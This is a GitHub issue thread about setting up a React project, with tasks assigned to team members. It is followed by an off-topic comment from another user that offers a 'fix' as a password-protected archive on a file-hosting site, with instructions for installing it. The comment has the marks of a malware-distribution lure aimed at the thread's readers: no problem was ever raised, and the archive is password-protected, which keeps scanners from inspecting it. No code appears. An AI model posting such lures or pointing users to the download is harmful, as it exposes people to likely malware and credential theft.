### ISSUE TITLE
Project Initialization (Group Task) - [1H]

### ISSUE THREAD

**Issue by ahzamir** [ahzamir/task-manager#1]
1. **Initialize React Project** - **[0.5H]**
   - **Description:** Set up a new React project using `create-react-app`. Install and configure the necessary dependencies like Redux, React Router, and TailwindCSS.
- Ahmad: Create React App
- Shegofa: React-router
- Ahmad: Tailwind CSS

**Comment by rickdoq** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx
